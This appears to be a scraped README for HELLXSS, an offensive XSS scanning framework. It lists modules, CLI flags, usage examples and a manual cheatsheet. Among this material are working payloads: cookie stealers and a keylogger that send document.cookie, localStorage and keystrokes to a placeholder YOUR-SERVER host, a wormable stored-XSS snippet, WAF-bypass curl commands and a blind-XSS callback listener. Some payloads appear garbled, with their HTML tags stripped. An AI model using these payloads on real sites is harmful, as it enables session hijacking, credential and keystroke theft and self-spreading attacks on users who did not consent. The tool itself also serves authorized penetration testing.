Share
## https://sploitus.com/exploit?id=07C05ACA-85B9-5672-8E80-01087E523B74
```
βββ ββββββββββββββ βββ βββ βββββββββββββββββββ
βββ ββββββββββββββ βββ ββββββββββββββββββββββββ
ββββββββββββββ βββ βββ ββββββ ββββββββββββββββ
ββββββββββββββ βββ βββ ββββββ ββββββββββββββββ
βββ βββββββββββββββββββββββββββ ββββ βββββββββββββββββββ
βββ βββββββββββββββββββββββββββ βββ βββββββββββββββββββ
v 1 . 0 U L T R A β M A D E I N H E L L
```
# π₯ HELLXSS v1.0 ULTRA
### The World's Most Powerful XSS Hunter & Automation Framework
### *"Give it a URL. Walk away. Come back to every XSS on the target."*
[](https://github.com/hellrider978)
[](https://github.com/hellrider978)
[](https://github.com/hellrider978/hellxss)
[](https://github.com/hellrider978/hellxss)
[](https://python.org)
[](https://kali.org)
[](LICENSE)
[](https://github.com/hellrider978/hellxss)
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β 2047 LINES Β· 13 XSS MODULES Β· 200+ PAYLOADS Β· PURE PYTHON β
β ONE COMMAND β FULL AUTO CRAWL β FIND ALL XSS β REPORT β
β β
β Reflected Β· Stored Β· DOM Β· Blind Β· Header Β· JSON/API β
β Template Injection Β· Upload XSS Β· Prototype Pollution Β· mXSS β
β Polyglot Β· Context-Aware Β· WAF Bypass Β· CSP Analysis β
β Cookie Stealer PoC Β· Keylogger Payload Β· Full Exploit in Report β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
> **βοΈ Built by RAJESH BAJIYA**
> **π₯ Handle: HACKEROFHELL**
> **π GitHub: [hellrider978](https://github.com/hellrider978)**
---
## β οΈ LEGAL DISCLAIMER
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β !! IMPORTANT !! β
β β
β HELLXSS is for AUTHORIZED testing ONLY: β
β Β· Systems you personally OWN β
β Β· Systems with EXPLICIT WRITTEN permission to test β
β Β· Authorized bug bounty programs (HackerOne/Bugcrowd/etc.) β
β β
β RAJESH BAJIYA / HACKEROFHELL / hellrider978 takes ZERO liability. β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
## π TABLE OF CONTENTS
| # | Section |
|---|---------|
| 01 | [What is HELLXSS?](#-what-is-hellxss) |
| 02 | [How It Works β One Command](#-how-it-works--one-command) |
| 03 | [Full Feature List](#-full-feature-list) |
| 04 | [All 13 XSS Modules](#-all-13-xss-modules) |
| 05 | [200+ Payload Library](#-200-payload-library) |
| 06 | [Requirements & Installation](#-requirements--installation) |
| 07 | [All CLI Flags](#-all-cli-flags) |
| 08 | [Usage β Every Scenario](#-usage--every-scenario) |
| **09** | **[β‘ HOW TO SKIP MODULES](#-how-to-skip-modules)** |
| 10 | [Output Files](#-output-files) |
| 11 | [Reading the HTML Report](#-reading-the-html-report) |
| 12 | [Manual XSS Cheatsheet](#-manual-xss-cheatsheet) |
| 13 | [Troubleshooting](#-troubleshooting) |
| 14 | [Author](#-author) |
---
## π₯ What is HELLXSS?
**HELLXSS** is the world's most complete automated XSS hunter. Built in pure Python 3 by **RAJESH BAJIYA (HACKEROFHELL / hellrider978)**.
You give it **one URL**. It automatically finds:
- **Reflected XSS** β in every GET parameter, POST form field, path segment
- **Stored XSS** β in comments, profiles, forms, any persistent input
- **DOM XSS** β by analyzing JavaScript sources and sinks
- **Blind XSS** β with out-of-band callbacks, cookie stealers, keyloggers
- **Header XSS** β User-Agent, Referer, X-Forwarded-For, and 6 more headers
- **JSON/API XSS** β REST endpoints, JSON body injection
- **Template Injection β XSS** β Angular, Vue, Jinja2, Twig, Handlebars
- **Upload XSS** β SVG, HTML, XML file upload vectors
- **Prototype Pollution β XSS** β `__proto__` to DOM injection
- **Polyglot XSS** β payloads that work in multiple contexts at once
- **mXSS** β mutation-based browser XSS
And the report includes the **full payload library** β every payload tested β so you can copy and use them manually too.
---
## βοΈ How It Works β One Command
```bash
python3 hellxss.py -t https://target.com
```
**Completely automatic:**
1. Crawls every page, discovers every form, JS endpoint, and parameter
2. Mines historical URLs from Wayback Machine
3. Analyzes JavaScript files for DOM sinks and sources
4. Tests every injection point with context-aware payloads
5. Detects the HTML/JS/attribute/URL context and uses the right payloads
6. Confirms every finding before saving β zero false positives
7. Generates HTML report with PoC, cookie stealer payload, and full payload library
---
## β¨ Full Feature List
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β HELLXSS v1.0 ULTRA β COMPLETE FEATURES β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β INTELLIGENCE β
β β Full target crawl with configurable depth β
β β Historical URL mining (Wayback Machine) β
β β Form discovery (GET/POST, hidden fields) β
β β File upload form detection β
β β Login form identification β
β β JavaScript endpoint extraction β
β β API endpoint discovery β
β β
β XSS TECHNIQUES (13 Modules) β
β β Reflected XSS (GET params + POST forms) β
β β Stored/Persistent XSS (any stored input) β
β β DOM XSS (sourceβsink flow analysis) β
β β Blind XSS (out-of-band, cookie stealer, keylogger) β
β β Header XSS (8 HTTP headers tested) β
β β JSON/API XSS (REST + GraphQL body injection) β
β β Template Injection β XSS (6 template engines) β
β β File Upload XSS (SVG, HTML, XML, PHP bypass) β
β β CSP Analysis + bypass detection β
β β Prototype Pollution β XSS β
β β Polyglot XSS (multi-context payloads) β
β β mXSS (Mutation XSS browser quirks) β
β β DOM Clobbering β
β β
β CONTEXT-AWARE PAYLOADS β
β β Auto-detects HTML context (body/attr/js/url/css/comment) β
β β Selects optimal payloads per context β
β β Attribute breakout payloads (single+double quote) β
β β JavaScript context breakout β
β β URL attribute (href/src/action) payloads β
β β CSS context escape β
β β
β WAF BYPASS β
β β 50+ bypass encoding techniques β
β β Case mixing, comment injection, null bytes β
β β Unicode normalization, HTML entity encoding β
β β Double/triple URL encoding β
β β Tab/newline space replacement β
β β SVG/math/noscript tag smuggling β
β β
β PAYLOAD LIBRARY (200+) β
β β Basic payloads (20) β
β β Event handler payloads (18) β
β β WAF bypass payloads (50+) β
β β Attribute context (17) β
β β JavaScript context (14) β
β β URL context (8) β
β β Polyglot payloads (6) β
β β Blind XSS callback (12) β
β β Template-specific (6 engines Γ 3-4 payloads) β
β β mXSS (8) β
β β CSP bypass (6) β
β β SVG/XML vectors (4) β
β β Full cookie stealer exploit payload β
β β Keylogger payload β
β β
β ADVANCED β
β β Multi-threaded (configurable 1-50 threads) β
β β Burp Suite proxy integration β
β β Session cookie support β
β β Bearer token / Basic auth β
β β Random User-Agent rotation β
β β Discord/Slack webhook notifications β
β β Ctrl+C safe (partial report on interrupt) β
β β
β REPORTING β
β β Professional dark-theme HTML report β
β β CVSS score per finding β
β β Copy PoC button (one click) β
β β Copy Payload button (one click) β
β β Cookie stealer + keylogger payload per finding β
β β Full payload library embedded in report β
β β findings JSON for programmatic use β
β β RAJESH BAJIYA / HACKEROFHELL fingerprint β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
## π§© All 13 XSS Modules
### Module 01 β Target Intelligence & Crawling
Discovers every injectable point automatically.
```
Discovers:
β Every page (recursive crawl, configurable depth)
β All GET parameters (?q=test&id=1&page=2)
β All POST forms (hidden fields included)
β File upload forms (for SVG/HTML upload XSS)
β Login forms (identified automatically)
β Historical URLs (Wayback Machine, up to 3000 URLs)
β JavaScript endpoints (fetch/axios/url/path extraction)
β API endpoints (/api/, /rest/, /v1/, .json)
```
---
### Module 03 β Reflected XSS
The core reflected XSS hunter with context detection.
```
Method:
Step 1: Inject unique marker into each parameter
Step 2: Detect if marker is reflected
Step 3: Analyze context (html_body / javascript / attr_" / attr_' / url_attr / css / textarea)
Step 4: Select optimal payloads for detected context
Step 5: Inject and confirm XSS fires (unescaped in response)
Payloads per context:
html_body: Basic + Event handlers + WAF bypass
javascript: JS context breakout (';alert(1)// etc.)
attr_": Attribute breakout (double quote escape)
attr_': Attribute breakout (single quote escape)
url_attr: javascript: / data: / vbscript: URIs
css: escape
textarea: escape
WAF bypass: URL encode, double encode, case mix, comment inject
```
---
### Module 04 β Stored XSS
```
Tests: All POST forms across entire target
Payloads: 12 stored XSS payloads
Detection: After submission, visits 8 likely display pages
Checks: /comments, /posts, /reviews, /profile, /dashboard, original form page
Wormable payload included in PoC:
var x=new XMLHttpRequest();x.open('POST','/form',false);
x.send('{field}='+encodeURIComponent(document.scripts[0].innerText));
x.send();
```
---
### Module 05 β DOM XSS Analysis
```
Method: Static analysis of JavaScript source code
Analyzes: All collected JS files + inline scripts on every page
Sources checked (14):
location.search location.hash location.href
document.URL document.referrer document.cookie
window.name history.pushState postMessage
localStorage sessionStorage URLSearchParams
querystring history.replaceState
Sinks checked (28):
document.write innerHTML outerHTML
insertAdjacentHTML eval setTimeout
setInterval new Function location=
location.href= location.assign location.replace
document.domain= .src= .href=
window.open jQuery("
Escalation: Template injection β RCE (Jinja2/Twig) also noted in PoC
```
---
### Module 10 β File Upload XSS
```
Files tested:
hellxss.svg β SVG with alert() + onload handler
hellxss.html β HTML page with body onload + inline script
hellxss.xml β XML with JavaScript entity
hellxss.php β Disguised as image/jpeg, contains XSS
test.jpg β JPEG magic bytes + XSS payload (polyglot)
Detection: After upload, checks response for reflected path, then fetches uploaded URL
```
---
### Module 11 β CSP Analysis
```
Detects:
β Missing CSP header (XSS has maximum impact)
β unsafe-inline in script-src (inline script bypass)
β unsafe-eval (eval-based XSS possible)
β Wildcard (*) in script-src (any script loadable)
β data: URI allowed (data: XSS vectors usable)
β CDN domains with JSONP endpoints (bypass via JSONP)
β No nonce/strict-dynamic (hash bypass possible)
```
---
### Module 12 β Prototype Pollution β XSS
```
Tests: 3 prototype pollution patterns
?__proto__[innerHTML]=
?constructor[prototype][innerHTML]=
?__proto__[src]=1&__proto__[onerror]=alert(1)
Confirms: If XSS payload appears in response body = exploitable
```
---
### Module 13 β Polyglot + mXSS
```
Polyglot payloads: Work in HTML body + JS context + attribute + URL simultaneously
mXSS payloads: Browser mutation-based β work after HTML parsing transforms content
DOM Clobbering: id/name attribute overwrite attacks
```
---
## π 200+ Payload Library
The report embeds the **entire payload library** so you can copy any payload manually.
### Quick Reference
```html
alert(1)
">alert(1)
" onmouseover="alert(1)"
' onfocus='alert(1)' autofocus='
">
';alert(1)//
";alert(1)//
alert(1)
`; alert(1); //`
alert(1)
alert(1)">
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )
">
fetch('https://YOUR-SERVER/steal?d='+btoa(JSON.stringify({cookie:document.cookie,url:location.href})))
document.addEventListener('keydown',function(e){fetch('https://YOUR-SERVER/keys?k='+btoa(e.key))})
```
---
## π¦ Requirements & Installation
### Install in 60 seconds
```bash
# Clone from GitHub
git clone https://github.com/hellrider978/hellxss.git
cd hellxss
# Install dependencies
pip3 install requests beautifulsoup4 --break-system-packages
# Make executable
chmod +x hellxss.py
# Test on known vulnerable target
python3 hellxss.py -t https://testphp.vulnweb.com
```
### Manual (copy-paste method)
```bash
mkdir ~/hellxss && cd ~/hellxss
nano hellxss.py
# β Paste code β Ctrl+X β Y β Enter
chmod +x hellxss.py
pip3 install requests beautifulsoup4 --break-system-packages
python3 hellxss.py -t https://target.com
```
### Verify
```bash
python3 hellxss.py --help
# Should show HELLXSS banner + all flags
```
---
## ποΈ All CLI Flags
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β HELLXSS v1.0 ULTRA β ALL FLAGS β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β β
β TARGET (required): β
β -t, --target https://target.com URL, domain, or IP β
β -u, --url Test a specific URL with params β
β -f, --url-file File with list of URLs (one per line) β
β β
β OUTPUT: β
β -o, --output ~/hellxss_output Output directory β
β β
β AUTH / SESSION: β
β --cookie "PHPSESSID=abc;token=xyz" Session cookies β
β --headers "Authorization: Bearer TOKEN" Custom headers β
β --token "YOUR_JWT" Bearer token β
β --auth "user:pass" HTTP Basic auth β
β β
β PROXY: β
β -p, --proxy http://127.0.0.1:8080 Burp Suite β
β β
β SCAN DEPTH: β
β --crawl Enable deep crawling (default: smart crawl) β
β --deep Max depth + all techniques β
β --ultra EVERYTHING: crawl+deep+waf-bypass+level3 β
β --level 1|2|3 Payload depth 1=fast 2=normal 3=thorough β
β β
β BLIND XSS: β
β --blind-url https://your-server.com Callback server β
β (or use https://xsshunter.trufflesecurity.com) β
β β
β SPEED: β
β --threads 10 Thread count (default: 10) β
β --timeout 15 Request timeout seconds β
β --delay 0 Seconds between requests β
β β
β BYPASS: β
β --waf-bypass Enable WAF bypass encoding techniques β
β --random-agent Rotate User-Agent per request β
β --user-agent "" Set custom User-Agent β
β β
β SKIP FLAGS (see Section 09): β
β --skip-crawl Skip Module 01 crawling β
β --skip-stored Skip Module 04 (stored XSS) β
β --skip-dom Skip Module 05 (DOM XSS) β
β --skip-blind Skip Module 06 (blind XSS) β
β --skip-headers Skip Module 07 (header XSS) β
β --skip-template Skip Module 09 (template injection) β
β --skip-modules 1,5,6 Skip any module by number β
β β
β NOTIFICATIONS: β
β --webhook https://hooks.slack.com/... Slack/Discord β
β β
β MISC: β
β --verify-ssl Enable SSL verification β
β --silent Suppress non-finding output β
β -h, --help Show help β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
## π» Usage β Every Scenario
### ββ The One Command You Need ββ
```bash
python3 hellxss.py -t https://target.com
```
---
### Standard Scans
```bash
# Basic β auto everything
python3 hellxss.py -t https://target.com
# Domain only (auto https://)
python3 hellxss.py -t target.com
# Deep crawl + all techniques
python3 hellxss.py -t https://target.com --crawl --deep
# Maximum power (ultra mode)
python3 hellxss.py -t https://target.com --ultra
# Test specific URL with known parameter
python3 hellxss.py -t https://target.com -u "https://target.com/search?q=test"
# Test list of URLs from file
python3 hellxss.py -t https://target.com -f urls.txt
```
---
### With Session Auth
```bash
# Cookie from browser DevTools
python3 hellxss.py -t https://target.com \
--cookie "PHPSESSID=abc123;_session=xyz789"
# JWT Bearer token
python3 hellxss.py -t https://target.com \
--token "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
# Multiple custom headers
python3 hellxss.py -t https://target.com \
--headers "Authorization: Bearer TOKEN" \
--cookie "session=abc123"
```
---
### Blind XSS (Most Powerful)
```bash
# With your own server
python3 hellxss.py -t https://target.com \
--blind-url https://your-server.com
# With XSS Hunter (free service)
python3 hellxss.py -t https://target.com \
--blind-url https://xsshunter.trufflesecurity.com
# Blind XSS + deep scan
python3 hellxss.py -t https://target.com \
--blind-url https://your-server.com --ultra
# Set up your listener:
python3 -m http.server 8888
# Then use: --blind-url http://YOUR_IP:8888
```
---
### WAF Bypass Mode
```bash
# Enable all WAF bypass encodings
python3 hellxss.py -t https://target.com --waf-bypass
# Rotate User-Agent + WAF bypass
python3 hellxss.py -t https://target.com \
--waf-bypass --random-agent
# Stealth + bypass
python3 hellxss.py -t https://target.com \
--waf-bypass --random-agent --delay 1 --rate 20
```
---
### Proxy Through Burp Suite
```bash
# Route all requests through Burp
python3 hellxss.py -t https://target.com \
-p http://127.0.0.1:8080
# Burp + all features
python3 hellxss.py -t https://target.com \
-p http://127.0.0.1:8080 --ultra
```
---
### API / JSON Testing Focus
```bash
# API mode
python3 hellxss.py -t https://target.com/api \
--skip-modules 4,10 --threads 5
```
---
### Discord/Slack Notifications
```bash
# Alert on each XSS found
python3 hellxss.py -t https://target.com \
--webhook "https://hooks.slack.com/services/T000/B000/xxxx"
python3 hellxss.py -t https://target.com \
--webhook "https://discord.com/api/webhooks/YOUR_ID/TOKEN"
```
---
### Full Power Scan
```bash
python3 hellxss.py \
-t https://target.com \
-o ~/pentests/target_xss \
--ultra \
--blind-url https://your-server.com \
--waf-bypass \
--random-agent \
--threads 15 \
--level 3 \
-p http://127.0.0.1:8080 \
--webhook "https://hooks.slack.com/YOUR/WEBHOOK" \
--cookie "session=YOUR_COOKIE"
```
---
## β‘ HOW TO SKIP MODULES
> **Full guide on controlling which XSS techniques run.**
---
### Method 1 β Built-in Skip Flags (Easiest)
```bash
# Skip DOM XSS analysis (Module 05) β can be slow on large JS codebases
python3 hellxss.py -t https://target.com --skip-dom
# Skip blind XSS (Module 06) β only useful when you have a callback server
python3 hellxss.py -t https://target.com --skip-blind
# Skip stored XSS (Module 04) β skip if target has no persistent storage
python3 hellxss.py -t https://target.com --skip-stored
# Skip header XSS (Module 07)
python3 hellxss.py -t https://target.com --skip-headers
# Skip template injection (Module 09)
python3 hellxss.py -t https://target.com --skip-template
# Skip crawling β only test exact URL you give
python3 hellxss.py -t https://target.com/search?q=test --skip-crawl
```
---
### Method 2 β Skip by Module Number
```bash
# Skip specific modules by number
python3 hellxss.py -t https://target.com --skip-modules 5,6,10
# Skip multiple
python3 hellxss.py -t https://target.com --skip-modules 4,5,6,9,10,12,13
# Skip heavy/slow modules for fast first-pass
python3 hellxss.py -t https://target.com --skip-modules 4,5,6,10,12,13
```
---
### Module Number Reference
| Module # | Name | When to SKIP it |
|----------|------|----------------|
| 1 | Intelligence & Crawling | You have URL list β `-f urls.txt --skip-crawl` |
| 3 | Reflected XSS | Never skip β this is the core module |
| 4 | Stored XSS | Target has no persistent storage |
| 5 | DOM XSS | No JS or already reviewed manually β slow on large JS |
| 6 | Blind XSS | No callback server available, or not testing admin panels |
| 7 | Header XSS | Headers not logged/stored by app |
| 8 | JSON/API XSS | No API endpoints on target |
| 9 | Template Injection | Target not using template engines |
| 10 | Upload XSS | No file upload functionality on target |
| 11 | CSP Analysis | Already reviewed CSP manually |
| 12 | Prototype Pollution | Target not a JavaScript-heavy SPA |
| 13 | Polyglot XSS | Already covered by Module 3 results |
| 20 | Report | **NEVER SKIP** |
---
### Common Skip Scenarios
```bash
# === SCENARIO: Quick reflected XSS check only ===
python3 hellxss.py -t https://target.com \
--skip-modules 4,5,6,7,8,9,10,11,12,13
# === SCENARIO: I have my URL list, skip crawling ===
python3 hellxss.py -t https://target.com \
-f my_urls.txt --skip-crawl
# === SCENARIO: Only DOM XSS analysis ===
python3 hellxss.py -t https://target.com \
--skip-modules 3,4,6,7,8,9,10,11,12,13
# === SCENARIO: Only blind XSS injection (no confirmation needed) ===
python3 hellxss.py -t https://target.com \
--blind-url https://your-server.com \
--skip-modules 3,4,5,7,8,9,10,11,12,13
# === SCENARIO: API focus only ===
python3 hellxss.py -t https://target.com/api \
--skip-modules 4,5,6,9,10,11,12,13
# === SCENARIO: Fast first-pass ===
python3 hellxss.py -t https://target.com \
--skip-modules 4,5,6,9,10,12,13 --level 1
# === SCENARIO: Hardened target, WAF bypass needed ===
python3 hellxss.py -t https://target.com \
--waf-bypass --random-agent --level 3 \
--skip-modules 4,5,6,10
# === SCENARIO: Only check for CSP issues (fastest possible) ===
python3 hellxss.py -t https://target.com \
--skip-modules 3,4,5,6,7,8,9,10,12,13
```
---
### Speed Comparison
| Combination | Speed | Best For |
|------------|-------|---------|
| `--ultra` | π’ Slowest | Full audit |
| Default | πΆ Normal | Standard bug bounty |
| `--skip-modules 4,5,6,10` | π Fast | Quick initial check |
| `--skip-modules 4,5,6,9,10,12,13 --level 1` | β‘ Fastest | Rapid triage |
| `--skip-crawl -u URL` | β‘β‘ Instant | Single known parameter |
---
## π Output Files
```
~/hellxss_output/
βββ target.com/
β
βββ HELLXSS_target.com_20241025_143022.html β OPEN THIS (main report)
β
βββ hellxss_findings.json β Machine-readable findings
β {
β "target": "https://target.com",
β "author": "RAJESH BAJIYA",
β "handle": "HACKEROFHELL",
β "tool": "HELLXSS v1.0 ULTRA",
β "findings": [
β {
β "title": "Reflected XSS β Context: html_body",
β "type": "reflected",
β "severity": "HIGH",
β "cvss": "7.4",
β "url": "https://target.com/search?q=test",
β "parameter": "q",
β "payload": "",
β "context": "html_body",
β "poc": "...",
β "remediation": "..."
β }
β ]
β }
β
βββ summary.txt β Quick text summary
β
βββ js_XXXXXXXX.txt β Extracted JS file contents
β (one per discovered JS file, used for DOM analysis)
β
βββ blind_xss_injected.txt β Blind XSS injection log
(if blind XSS module ran)
HELLXSS Blind XSS Injection Log
Callback URL: https://your-server.com
Unique ID: blind_ABCD1234
Injected: 247 times
Check: https://your-server.com/hellxss/blind_ABCD1234
```
---
## π Reading the HTML Report
```bash
# Open the report
firefox ~/hellxss_output/target.com/HELLXSS_*.html
# Auto-find and open
find ~/hellxss_output -name "HELLXSS_*.html" | xargs firefox
```
**What's in the report:**
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β HELLXSS ASCII ART BANNER β
β XSS VULNERABILITY AUDIT REPORT β
β RAJESH BAJIYA | HACKEROFHELL | hellrider978 | CONFIDENTIAL β
β Risk Score β
ββββββββββββββββββββββ¬βββββββββββββββββββ¬βββββββββββββββββββββββββββ€
β Severity Chart β Statistics β XSS Types Found β
β HIGH βββββ β Total: 7 β reflected β
β MEDIUM ββ β High: 5 β dom β
β β Medium: 2 β stored β
ββββββββββββββββββββββ΄βββββββββββββββββββ΄βββββββββββββββββββββββββββ€
β π₯ CONFIRMED XSS FINDINGS β
β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β [HIGH] CVSS 7.4 β‘ REFLECTED html_body βΌ β β
β β URL: https://target.com/search?q=test β β
β β Parameter: q β β
β β Context: html_body β β
β β Payload: β β
β β Evidence: Payload reflected unescaped β β
β β PoC: curl 'URL' | ... [β COPY PoC] [π COPY PAYLOAD] β β
β β Fix: HTML-encode output. Implement CSP. β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β
β π XSS PAYLOAD LIBRARY β All 200+ Payloads Tested β
β Basic Β· Event Handlers Β· WAF Bypass Β· Polyglot Β· Blind XSS... β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
**Each finding has TWO copy buttons:**
- `β COPY PoC` β copies the full curl/exploit command
- `π COPY PAYLOAD` β copies just the XSS payload for manual use
---
## π Manual XSS Cheatsheet
Quick reference for manual testing.
### Basic Detection
```bash
# Inject and check response
curl -sk "https://target.com/search?q=alert(1)" | grep -i "alert"
curl -sk "https://target.com/search?q=HELLXSS_TEST" | grep "HELLXSS_TEST"
# Check if reflected unescaped
curl -sk "https://target.com/page?q=" | grep -v "<HELLXSS>" | grep "HELLXSS"
```
### Context Detection
```bash
# Inject marker, check surrounding HTML context
curl -sk "https://target.com/search?q=HELLXSS_MARKER" | grep -A2 -B2 "HELLXSS_MARKER"
# If marker appears inside : use JS context payloads
# If marker appears in href="...": use javascript: payloads
# If marker appears in value="...": use " onmouseover=alert(1) " payloads
# If marker appears in raw HTML: use
```
### Testing All Contexts
```bash
BASE="https://target.com/search"
# HTML body context
curl -sk "$BASE?q="
# Attribute context (double quote)
curl -sk "$BASE?q=\" onmouseover=\"alert(1)\""
# Attribute context (single quote)
curl -sk "$BASE?q=' onmouseover='alert(1)'"
# JavaScript context
curl -sk "$BASE?q=';alert(1)//"
# URL context (href/src)
curl -sk "$BASE?redirect=javascript:alert(1)"
# HTML tag context
curl -sk "$BASE?q= onmouseover=alert(1)//"
```
### WAF Bypass
```bash
# Case mixing
curl -sk "$BASE?q=alert(1)"
# Comment injection
curl -sk "$BASE?q=alert(1)"
# URL encoding
curl -sk "$BASE?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
# Double encoding
curl -sk "$BASE?q=%253Cscript%253Ealert(1)%253C/script%253E"
# Entity encoding
curl -sk "$BASE?q="
# SVG/math smuggling
curl -sk "$BASE?q="
curl -sk "$BASE?q="
curl -sk "$BASE?q="
# Template literal
curl -sk "$BASE?q="
```
### Cookie Stealer Payloads
```bash
# Redirect to attacker site with cookie
document.location='https://YOUR-SERVER/?c='+document.cookie
# Image beacon
# Fetch API
fetch('https://YOUR-SERVER/steal?c='+document.cookie)
# XHR
var x=new XMLHttpRequest();x.open('GET','https://YOUR-SERVER/steal?c='+document.cookie,true);x.send()
# Full data exfil
var data={cookie:document.cookie,url:location.href,localStorage:JSON.stringify(localStorage)};
fetch('https://YOUR-SERVER/steal?d='+btoa(JSON.stringify(data)));
# Keylogger
var log='';
document.addEventListener('keydown',function(e){
log+=e.key;
if(log.length>50){fetch('https://YOUR-SERVER/keys?k='+btoa(log));log='';}
});
```
### DOM XSS Testing
```bash
# Via URL hash
https://target.com/page#
# Via URL search
https://target.com/page?name=
# In browser console β test sinks manually
document.getElementById('output').innerHTML = location.hash.slice(1);
location.hash = '';
# Check for vulnerable patterns in JS
curl -sk "https://target.com/app.js" | grep -E "innerHTML|document\.write|eval\("
```
### Blind XSS Setup
```bash
# Option 1: Simple Python server
python3 -c "
import http.server, socketserver, urllib.parse
class H(http.server.BaseHTTPRequestHandler):
def do_GET(self):
print(f'[XSS CALLBACK] Path: {self.path}')
print(f' Data: {urllib.parse.unquote(self.path)}')
self.send_response(200)
self.end_headers()
self.wfile.write(b'ok')
with socketserver.TCPServer(('',8888),H) as s:
print('Listening on :8888')
s.serve_forever()
" &
# Then run HELLXSS with your IP:port
python3 hellxss.py -t https://target.com --blind-url http://YOUR_IP:8888
# Option 2: Use free service
# https://xsshunter.trufflesecurity.com
python3 hellxss.py -t https://target.com --blind-url https://YOUR-ID.xss.ht
```
### Testing Stored XSS
```bash
# Submit payload to form
curl -sk -X POST "https://target.com/comment" \
--data "name=test&message=alert(1)&email=test@test.com"
# Check if it fired
curl -sk "https://target.com/comments" | grep -i "alert(1)"
# Full stored XSS workflow
curl -sk -c cookies.txt -X POST "https://target.com/register" \
--data "username=testuseralert(1)&password=Test123!"
curl -sk -b cookies.txt "https://target.com/profile" | grep -i "alert(1)"
```
---
## π§ Troubleshooting
### No Module named 'requests'
```bash
pip3 install requests beautifulsoup4 --break-system-packages
# OR
sudo apt install python3-requests python3-bs4
```
### 0 Results on Known Vulnerable Target
```bash
# Try with specific URL and no crawl
python3 hellxss.py -t https://target.com \
-u "https://target.com/search?q=test" --skip-crawl
# Enable WAF bypass
python3 hellxss.py -t https://target.com --waf-bypass --level 3
# Try with session cookie (might require auth)
python3 hellxss.py -t https://target.com \
--cookie "PHPSESSID=YOUR_SESSION" --skip-crawl -u "URL_WITH_PARAM"
```
### Scan Too Slow
```bash
# Skip DOM analysis (most time-consuming on large JS)
python3 hellxss.py -t https://target.com --skip-dom
# Skip slow modules
python3 hellxss.py -t https://target.com --skip-modules 4,5,6,10 --level 1
# Use fewer threads on slow target
python3 hellxss.py -t https://target.com --threads 3 --delay 1
```
### Target Behind Cloudflare
```bash
python3 hellxss.py -t https://target.com \
--waf-bypass --random-agent \
--delay 2 --threads 3 \
-p http://127.0.0.1:8080 # observe in Burp
```
### Report Not Found
```bash
find ~/hellxss_output -name "HELLXSS_*.html" 2>/dev/null
# Ctrl+C also saves partial report
```
---
## π€ Contributing
```bash
git clone https://github.com/hellrider978/hellxss.git
cd hellxss
git checkout -b feature/self-xss-escalation-module
# Test on legal targets
python3 hellxss.py -t https://testphp.vulnweb.com --ultra
git commit -m "Add: Self-XSS + CSRF escalation module"
git push origin feature/self-xss-escalation-module
```
### Wanted Features
```
[ ] Headless browser verification (Playwright/Puppeteer)
[ ] Self-XSS + CSRF escalation chains
[ ] XSS to CSRF automation (steal CSRF token via XSS β perform action)
[ ] XSS to session takeover pipeline
[ ] GraphQL mutation XSS testing
[ ] Electron app XSS (desktop app testing)
[ ] PDF XSS (jsPDF, pdfkit vectors)
[ ] Email template XSS (newsletter body injection)
[ ] Flash/legacy plugin XSS (SWF injection)
[ ] Subdomain-based XSS (cookie scope testing)
[ ] Mass report export (HackerOne/Bugcrowd format)
```
---
## π€ Author
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β βββββββ ββββββ ββββββββββββββββββββββ βββ β
β ββββββββββββββββ ββββββββββββββββββββββ βββ β
β ββββββββββββββββ βββββββββ ββββββββββββββββ β
β ββββββββββββββββββ βββββββββ ββββββββββββββββ β
β βββ ββββββ ββββββββββββββββββββββββββββββ βββ β
β βββ ββββββ βββ ββββββ βββββββββββββββββββ βββ β
β B A J I Y A β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
## RAJESH BAJIYA
### π₯ HACKEROFHELL
**Bug Bounty Hunter Β· Penetration Tester Β· Security Researcher**
**"Built by a man from Hell β finds what others miss"**
[](https://github.com/hellrider978)
[](https://hackerone.com/hellrider978)
[](https://bugcrowd.com/hellrider978)
---
```
"XSS has been the #1 bug class in bug bounty for a decade.
HELLXSS makes sure you find every single one β
reflected, stored, DOM, blind, template, upload, and more."
β RAJESH BAJIYA | HACKEROFHELL
```
---
### β If HELLXSS found you bounties β Star it!
[](https://github.com/hellrider978/hellxss)
**Built with π₯ by RAJESH BAJIYA (HACKEROFHELL)**
**GitHub: [hellrider978](https://github.com/hellrider978)**
`#xss #bugbounty #pentesting #kalilinux #hackerofhell #rajeshbajiya #hellrider978 #automation #infosec`
---
## π License
```
MIT License β Copyright (c) 2024 RAJESH BAJIYA (HACKEROFHELL / hellrider978)
GitHub: https://github.com/hellrider978/hellxss
For authorized testing only. Author not liable for misuse.
```
---
```
π₯ HELLXSS v1.0 ULTRA π₯
Built by RAJESH BAJIYA β HACKEROFHELL β hellrider978
https://github.com/hellrider978/hellxss
```